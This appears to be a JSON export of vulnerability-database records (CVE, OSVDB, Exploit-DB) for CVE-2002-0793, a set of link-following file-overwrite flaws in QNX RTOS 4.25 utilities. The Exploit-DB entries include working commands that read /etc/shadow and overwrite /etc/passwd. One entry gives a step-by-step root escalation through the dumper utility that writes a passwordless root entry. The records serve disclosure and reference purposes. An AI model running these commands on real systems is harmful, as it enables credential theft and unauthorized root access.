{"type": "osvdb", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12215", "bulletinFamily": "software", "cvss": {"vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 4.6}, "viewCount": 1, "edition": 1, "reporter": "OSVDB", "title": "QNX RTOS monitor -f Argument Arbitrary File Overwrite", "affectedSoftware": [], "enchantments": {"score": {"value": 5.9, "vector": "NONE", "modified": "2017-04-28T13:20:07", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-0793"]}, {"type": "exploitdb", "idList": ["EDB-ID:21501", "EDB-ID:21500", "EDB-ID:21499"]}, {"type": "osvdb", "idList": ["OSVDB:12217", "OSVDB:12216", "OSVDB:12218"]}], "modified": "2017-04-28T13:20:07", "rev": 2}, "vulnersScore": 5.9}, "references": [], "id": "OSVDB:12215", "lastseen": "2017-04-28T13:20:07", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 12216](https://vulners.com/osvdb/OSVDB:12216)\n[Related OSVDB ID: 12217](https://vulners.com/osvdb/OSVDB:12217)\n[Related OSVDB ID: 12218](https://vulners.com/osvdb/OSVDB:12218)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n"}

{"cve": [{"lastseen": "2020-10-03T11:36:59", "description": "Hard link and possibly symbolic link following vulnerabilities in QNX RTOS 4.25 (aka QNX4) allow local users to overwrite arbitrary files via (1) the -f argument to the monitor utility, (2) the -d argument to dumper, (3) the -c argument to crttrap, or (4) using the Watcom sample utility.", "edition": 3, "cvss3": {}, "published": "2002-08-12T04:00:00", "title": "CVE-2002-0793", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2002-0793"], "modified": "2017-07-11T01:29:00", "cpe": ["cpe:/a:qnx:rtos:4.25"], "id": "CVE-2002-0793", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0793", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:qnx:rtos:4.25:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "## Vulnerability Description\nQNX RTOS contains a flaw that may allow a malicious user to overwrite arbitrary files. The issue is triggered when a local attacker uses the \"crttrap -c\" command, which will pontentially modify arbitrary files on the system.\n## Solution Description\nUpgrade to version 6.1.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nQNX RTOS contains a flaw that may allow a malicious user to overwrite arbitrary files. The issue is triggered when a local attacker uses the \"crttrap -c\" command, which will pontentially modify arbitrary files on the system.\n## Manual Testing Notes\ncrttrap -c /etc/shadow\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12216](https://vulners.com/osvdb/OSVDB:12216)\n[Related OSVDB ID: 12218](https://vulners.com/osvdb/OSVDB:12218)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12217", "id": "OSVDB:12217", "type": "osvdb", "title": "QNX RTOS crttrap -c Argument Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12216](https://vulners.com/osvdb/OSVDB:12216)\n[Related OSVDB ID: 12217](https://vulners.com/osvdb/OSVDB:12217)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12218", "id": "OSVDB:12218", "type": "osvdb", "title": "QNX RTOS Watcom Utility Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:07", "bulletinFamily": "software", "cvelist": ["CVE-2002-0793"], "edition": 1, "description": "# No description provided by the source\n\n## References:\n[Related OSVDB ID: 12215](https://vulners.com/osvdb/OSVDB:12215)\n[Related OSVDB ID: 12217](https://vulners.com/osvdb/OSVDB:12217)\n[Related OSVDB ID: 12218](https://vulners.com/osvdb/OSVDB:12218)\nISS X-Force ID: 9231\n[CVE-2002-0793](https://vulners.com/cve/CVE-2002-0793)\nBugtraq ID: 4902\n", "modified": "2002-05-31T00:00:00", "published": "2002-05-31T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:12216", "id": "OSVDB:12216", "type": "osvdb", "title": "QNX RTOS dumper -d Argument Arbitrary File Overwrite", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T16:37:29", "description": "QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability. CVE-2002-0793. Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 CRTTrap File Disclosure Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21499", "href": "https://www.exploit-db.com/exploits/21499/", "sourceData": "source: http://www.securityfocus.com/bid/4901/info\r\n\r\nThe QNX RTOS crttrap binary includes a command-line option for specifying a configuration file. crttrap is installed setuid by default. crttrap Local attackers may specify an arbitrary system file in place of the configuration file and crttrap will disclose the contents of the arbitrary file. \r\n\r\ncrttrap -c /etc/shadow ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21499/"}, {"lastseen": "2016-02-02T16:37:38", "description": "QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability. CVE-2002-0793. Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 monitor Arbitrary File Modification Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21500", "href": "https://www.exploit-db.com/exploits/21500/", "sourceData": "source: http://www.securityfocus.com/bid/4902/info\r\n\r\nThe QNX RTOS monitor utility is prone to an issue which may allow local attackers to modify arbitrary system files (such as /etc/passwd). monitor is installed setuid root by default.\r\n\r\nThe monitor -f command line option may be used by a local attacker to cause an arbitrary system file to be overwritten. Once overwritten, the attacker will gain ownership of the file.\r\n\r\nmonitor -f /etc/passwd ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21500/"}, {"lastseen": "2016-02-02T16:37:46", "description": "QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability. CVE-2002-0793. Local exploit for linux platform", "published": "2002-05-31T00:00:00", "type": "exploitdb", "title": "QNX RTOS 4.25 dumper Arbitrary File Modification Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-0793"], "modified": "2002-05-31T00:00:00", "id": "EDB-ID:21501", "href": "https://www.exploit-db.com/exploits/21501/", "sourceData": "source: http://www.securityfocus.com/bid/4904/info\r\n\r\nWhen creating memory dump files, the QNX RTOS debugging utility 'dumper' follows symbolic links. It also sets ownership of the file to the userid of the terminated process. It is possible for malicious local attackers to exploit this vulnerability to overwrite and gain ownership of arbitrary files. Consequently, attackers may elevate to root privileges by modifying files such as '/etc/passwd'. \r\n\r\nExample exploit, with /bin/dumper:\r\n\r\nLet EVIL be the unprivileged user who wants to gain root access.\r\n\r\n#link to the passwd file: dumper dumps to [process name].dmp\r\n$ ln /etc/passwd /home/EVIL/ksh.dmp\r\n#call the program that will attempt to write to the hard link\r\n$ dumper -d /home/EVIL -p [PID of EVIL's ksh]\r\n#have dumper do its job by terminating the monitored process\r\n$ exit\r\n#at this point, /etc/passwd is overwritten by the binary dump, and more\r\nimportantly: EVIL is now the owner !\r\n$ echo root::0:0::///:/bin/sh > /etc/passwd\r\n#but now no login works because /etc/passwd is not owned by userid 0. #So\r\nyou do:\r\n\r\n$ passwd\r\n\r\n#and change your password. This gives /etc/passwd ownership back to root,\r\nkeeping the modifications you have made.\r\n\r\n$ su\r\n# ", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21501/"}]}